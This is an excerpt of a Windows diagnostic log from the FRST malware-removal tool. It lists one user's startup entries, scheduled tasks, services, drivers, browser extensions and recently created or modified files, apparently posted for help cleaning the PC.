HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19987360 2022-07-22] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {03FE5072-C0AA-4FD4-A5AB-D07AB72268EE} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-07-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {7AFC5FDF-5FDB-4E8D-B085-FA011974B74B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8184678B-D5E0-4F9D-A393-D29C7ED8D710} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {AFA01216-F820-4523-B888-4643BC2C4370} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {B4140878-3094-4AA3-8AF4-08C5C55FCA4B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {D2EA96E7-1FC2-48FC-8CF6-8EBDE83366F4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FAA453B5-6123-4A6F-8608-AC30E0E9F16F} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
Edge:
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2022-07-17]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-26]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
Chrome:
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-30]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2022-07-17]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-07-28] (BattlEye Innovations e.K. -> )
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11293832 2022-07-28] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-07-26] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\Wellbia.com\ucldr_battlegrounds_gl.exe [5938216 2022-07-28] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10477800 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [10062496 2022-07-28] (PUBG CORPORATION -> KRAFTON, Inc)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8596792 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [1431328 2022-07-28] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 MpKsl628e4265; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{FAAE6B28-3F21-4216-876A-87905047AE75}\MpKslDrv.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-29 23:18 - 2022-07-29 23:19 - 1020300193 _____ (Garrett Tube) C:\Users\Miggy\Downloads\fredbear-and-friends-left-to-rot.exe
2022-07-28 22:20 - 2022-07-28 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\com.adobe.dunamis
2022-07-28 20:18 - 2022-07-28 20:18 - 000000223 _____ C:\Users\Miggy\Desktop\Persona 4 Golden.url
2022-07-28 18:03 - 2022-07-28 18:03 - 000000000 ____D C:\Users\Miggy\AppData\Local\MultiVersus
2022-07-28 14:06 - 2022-07-28 14:06 - 001431328 _____ (Wellbia.com Co., Ltd.) C:\WINDOWS\xhunter1.sys
2022-07-28 14:06 - 2022-07-28 14:06 - 000000000 ____D C:\Program Files\Common Files\Wellbia.com
2022-07-28 13:08 - 2022-07-28 13:08 - 000000222 _____ C:\Users\Miggy\Desktop\PUBG BATTLEGROUNDS.url
2022-07-27 18:02 - 2022-07-28 22:43 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-26 17:03 - 2022-07-26 17:03 - 000000223 _____ C:\Users\Miggy\Desktop\MultiVersus.url
2022-07-26 13:11 - 2022-07-26 13:11 - 000002034 _____ C:\Users\Miggy\Desktop\malwarebytes.txt
2022-07-26 12:50 - 2022-07-26 12:50 - 000000000 ____D C:\Users\Miggy\AppData\Local\mbam
2022-07-26 12:49 - 2022-07-26 12:49 - 000000000 ____D C:\Program Files\Malwarebytes
2022-07-26 12:48 - 2022-07-26 12:48 - 002556344 _____ (Malwarebytes) C:\Users\Miggy\Downloads\MBSetup-C4CAECC7.exe
2022-07-24 20:41 - 2022-07-24 20:41 - 000000222 _____ C:\Users\Miggy\Desktop\Fallout 4.url
2022-07-21 23:46 - 2022-07-21 23:47 - 464020665 _____ C:\Users\Miggy\Downloads\jolly3-v1.0.3.exe
2022-07-21 17:21 - 2022-07-21 17:21 - 000003842 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2022-07-21 17:21 - 2022-07-21 17:21 - 000003400 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2022-07-21 17:21 - 2022-07-21 17:21 - 000001172 _____ C:\Users\Miggy\Documents\eset.txt
2022-07-21 15:20 - 2022-07-21 15:20 - 000001382 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000001276 _____ C:\Users\Miggy\Desktop\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\ESET
2022-07-21 15:19 - 2022-07-21 15:19 - 015274968 _____ (ESET) C:\Users\Miggy\Downloads\esetonlinescanner.exe
2022-07-20 12:12 - 2022-07-28 15:50 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-07-19 16:46 - 2022-07-30 13:12 - 000000000 ____D C:\Users\Miggy\Downloads\FRST-OlderVersion
2022-07-17 17:51 - 2022-07-30 13:14 - 000000839 _____ C:\Users\Miggy\Downloads\Fixlog.txt
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-21 17:24 - 000040667 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-30 13:25 - 000025886 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-30 13:25 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-30 13:12 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-17 19:45 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-07-30 13:23 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-30 13:22 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-30 13:22 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-30 13:19 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-30 13:19 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-30 13:19 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-30 13:19 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-30 13:18 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-30 13:18 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-30 13:18 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-30 13:18 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-30 13:18 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-30 13:18 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-30 13:18 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-30 13:18 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-30 13:15 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-30 13:15 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-30 13:15 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-30 13:15 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-30 13:14 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-30 13:14 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-30 13:14 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-30 13:14 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
